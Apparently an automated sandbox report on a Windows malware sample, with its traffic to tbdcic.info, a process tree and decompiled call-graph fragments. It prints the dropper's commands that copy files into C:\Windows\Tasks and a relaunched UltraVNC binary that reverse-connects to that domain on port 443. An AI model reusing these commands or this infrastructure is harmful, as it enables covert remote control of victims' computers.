                                                    Dec 23, 2024 13:29:49.974967957 CET49792443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:49.974991083 CET44349792194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:49.975033045 CET44349792194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:50.101797104 CET49793443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:50.101825953 CET44349793194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:50.102608919 CET49793443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:50.102701902 CET49793443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:29:50.102714062 CET44349793194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:29:50.102865934 CET44349793194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:01.223735094 CET49819443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:01.223762989 CET44349819194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:01.224040985 CET49819443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:01.224423885 CET49819443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:01.224437952 CET44349819194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:01.224483967 CET44349819194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:23.863852978 CET49873443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:23.863955975 CET44349873194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:23.864033937 CET49873443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:23.864175081 CET49873443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:30:23.864197016 CET44349873194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:30:23.864259005 CET44349873194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:00.470407009 CET49954443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:00.470444918 CET44349954194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:00.470529079 CET49954443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:00.470686913 CET49954443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:00.470695972 CET44349954194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:00.470740080 CET44349954194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:44.241327047 CET49999443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:44.241427898 CET44349999194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:44.241833925 CET49999443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:44.242012024 CET49999443192.168.2.7194.190.152.201
                                                    Dec 23, 2024 13:31:44.242038965 CET44349999194.190.152.201192.168.2.7
                                                    Dec 23, 2024 13:31:44.242131948 CET44349999194.190.152.201192.168.2.7
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 23, 2024 13:29:27.386189938 CET6120053192.168.2.71.1.1.1
                                                    Dec 23, 2024 13:29:33.013232946 CET5788553192.168.2.71.1.1.1
                                                    Dec 23, 2024 13:29:33.151983023 CET53578851.1.1.1192.168.2.7
                                                    Dec 23, 2024 13:29:50.151766062 CET6347153192.168.2.71.1.1.1
                                                    Dec 23, 2024 13:29:50.288768053 CET53634711.1.1.1192.168.2.7
                                                    Dec 23, 2024 13:30:05.526115894 CET5268453192.168.2.71.1.1.1
                                                    Dec 23, 2024 13:30:05.664683104 CET53526841.1.1.1192.168.2.7
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Dec 23, 2024 13:29:27.386189938 CET192.168.2.71.1.1.10x8c34Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:29:33.013232946 CET192.168.2.71.1.1.10x5c6cStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:29:50.151766062 CET192.168.2.71.1.1.10xdfdcStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:05.526115894 CET192.168.2.71.1.1.10xb56eStandard query (0)tbdcic.infoA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Dec 23, 2024 13:29:27.524158955 CET1.1.1.1192.168.2.70x8c34No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                    Dec 23, 2024 13:29:29.344592094 CET1.1.1.1192.168.2.70x59d6No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:29:29.344592094 CET1.1.1.1192.168.2.70x59d6No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:29:33.151983023 CET1.1.1.1192.168.2.70x5c6cNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:29:50.288768053 CET1.1.1.1192.168.2.70xdfdcNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:05.664683104 CET1.1.1.1192.168.2.70xb56eNo error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:29.754944086 CET1.1.1.1192.168.2.70xad87No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:29.754944086 CET1.1.1.1192.168.2.70xad87No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:54.302576065 CET1.1.1.1192.168.2.70xbffaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:30:54.302576065 CET1.1.1.1192.168.2.70xbffaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:31:06.610454082 CET1.1.1.1192.168.2.70xbbfeNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                    Dec 23, 2024 13:31:06.610454082 CET1.1.1.1192.168.2.70xbbfeNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                    Click to jump to process

                                                    Click to jump to process

                                                    Click to dive into process behavior distribution

                                                    Click to jump to process

                                                    Target ID:0
                                                    Start time:07:29:13
                                                    Start date:23/12/2024
                                                    Path:C:\Users\user\Desktop\T8xrZb7nBL.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\T8xrZb7nBL.exe"
                                                    Imagebase:0x400000
                                                    File size:1'670'955 bytes
                                                    MD5 hash:1677BD5B561B890396AE1816066CA481
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1293861913.000000000296C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1294187731.000000000096B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.1293861913.00000000027A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:2
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:3
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:9
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff75da10000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:07:29:14
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 1
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:07:29:15
                                                    Start date:23/12/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                    Imagebase:0x7ff702560000
                                                    File size:5'641'176 bytes
                                                    MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:12
                                                    Start time:07:29:15
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 1
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:07:29:16
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskkill /f /im browser_sn.exe
                                                    Imagebase:0x290000
                                                    File size:74'240 bytes
                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:07:29:16
                                                    Start date:23/12/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:16
                                                    Start time:07:29:16
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 2
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:07:29:17
                                                    Start date:23/12/2024
                                                    Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1728,i,947990923128245266,18181737680692098631,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                    Imagebase:0x7ff6c3ff0000
                                                    File size:3'581'912 bytes
                                                    MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:19
                                                    Start time:07:29:18
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 1
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:07:29:21
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 2
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:07:29:23
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\Tasks\browser_sn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Tasks\browser_sn.exe
                                                    Imagebase:0x7ff790c30000
                                                    File size:1'945'368 bytes
                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000000.1393570628.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000018.00000000.1393479279.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\browser_sn.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 0%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:07:29:23
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 8
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:09:21:44
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\Tasks\browser_sn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                    Imagebase:0x7ff790c30000
                                                    File size:1'945'368 bytes
                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000000.1476676478.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000000.1476609556.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000002.1480308642.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 0000001C.00000002.1480178040.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:09:21:44
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 2
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:09:21:46
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 4
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:09:21:50
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:cmd /c "C:\Windows\Tasks\3889122.cmd"
                                                    Imagebase:0x410000
                                                    File size:236'544 bytes
                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:09:21:50
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 1
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:09:21:51
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\taskkill.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:taskkill /f /im browser_sn.exe
                                                    Imagebase:0x290000
                                                    File size:74'240 bytes
                                                    MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:09:21:51
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 2
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:09:21:53
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\Tasks\browser_sn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Tasks\browser_sn.exe
                                                    Imagebase:0x7ff790c30000
                                                    File size:1'945'368 bytes
                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000002.2541200831.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000000.1563515098.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000000.1563639485.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000023.00000002.2540896088.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    Has exited:false

                                                    Target ID:36
                                                    Start time:09:21:53
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 8
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:09:22:01
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\Tasks\browser_sn.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443
                                                    Imagebase:0x7ff790c30000
                                                    File size:1'945'368 bytes
                                                    MD5 hash:749B3A68B9C5325D592822EE7C2C17EC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000000.1645104841.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000002.1647604214.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000002.1647324696.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000025.00000000.1644928843.00007FF790D09000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:09:22:01
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 4
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:09:22:05
                                                    Start date:23/12/2024
                                                    Path:C:\Windows\SysWOW64\timeout.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:timeout /t 600
                                                    Imagebase:0x840000
                                                    File size:25'088 bytes
                                                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:18.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:26.6%
                                                      Total number of Nodes:1619
                                                      Total number of Limit Nodes:14
                                                      execution_graph 8461 40c460 8462 40c467 8461->8462 8463 40c46f 8461->8463 8465 40c499 8463->8465 8466 40275c 8463->8466 8471 4026cf 8466->8471 8469 40276a 8469->8465 8470 40276b malloc 8472 4026df 8471->8472 8478 4026db 8471->8478 8473 4026ef GlobalMemoryStatusEx 8472->8473 8472->8478 8474 4026fd 8473->8474 8473->8478 8474->8478 8479 402187 8474->8479 8478->8469 8478->8470 8481 40219e 8479->8481 8480 4021cf GetLastError wsprintfW GetEnvironmentVariableW GetLastError 8483 402207 ??2@YAPAXI GetEnvironmentVariableW 8480->8483 8484 40227f SetLastError 8480->8484 8481->8480 8482 4021c5 8481->8482 8499 408d52 8482->8499 8486 402268 ??3@YAXPAX 8483->8486 8487 402236 GetLastError 8483->8487 8484->8482 8485 402296 8484->8485 8489 4022b5 lstrlenA ??2@YAPAXI 8485->8489 8508 402131 8485->8508 8491 40226b 8486->8491 8487->8486 8490 40223c 8487->8490 8493 402320 MultiByteToWideChar 8489->8493 8494 4022e6 GetLocaleInfoW 8489->8494 8490->8491 8495 402246 lstrcmpiW 8490->8495 8491->8484 8493->8482 8494->8493 8497 40230d _wtol 8494->8497 8495->8486 8498 402255 ??3@YAXPAX 8495->8498 8496 4022ab 8496->8489 8497->8493 8498->8491 8515 407c87 8499->8515 8502 408d89 8520 407ce8 8502->8520 8503 408d77 IsBadReadPtr 8503->8502 8507 408dba 8507->8478 8509 40213b GetUserDefaultUILanguage 8508->8509 8510 40217f 8508->8510 8511 402158 8509->8511 8512 40215c GetSystemDefaultUILanguage 8509->8512 8510->8496 8511->8496 8512->8510 8513 402168 GetSystemDefaultLCID 8512->8513 8513->8510 8514 402178 8513->8514 8514->8510 8533 401458 8515->8533 8518 407ce4 IsWindow 8518->8502 8518->8503 8519 407cc0 GetSystemMetrics GetSystemMetrics 8519->8518 8521 407cf7 8520->8521 8522 407d5b 8520->8522 8521->8522 8541 402771 8521->8541 8532 407a5b ??3@YAXPAX 8522->8532 8524 407d08 8525 402771 2 API calls 8524->8525 8526 407d13 8525->8526 8545 4041f8 8526->8545 8529 4041f8 20 API calls 8530 407d25 ??3@YAXPAX ??3@YAXPAX 8529->8530 8530->8522 8532->8507 8536 401172 8533->8536 8537 401180 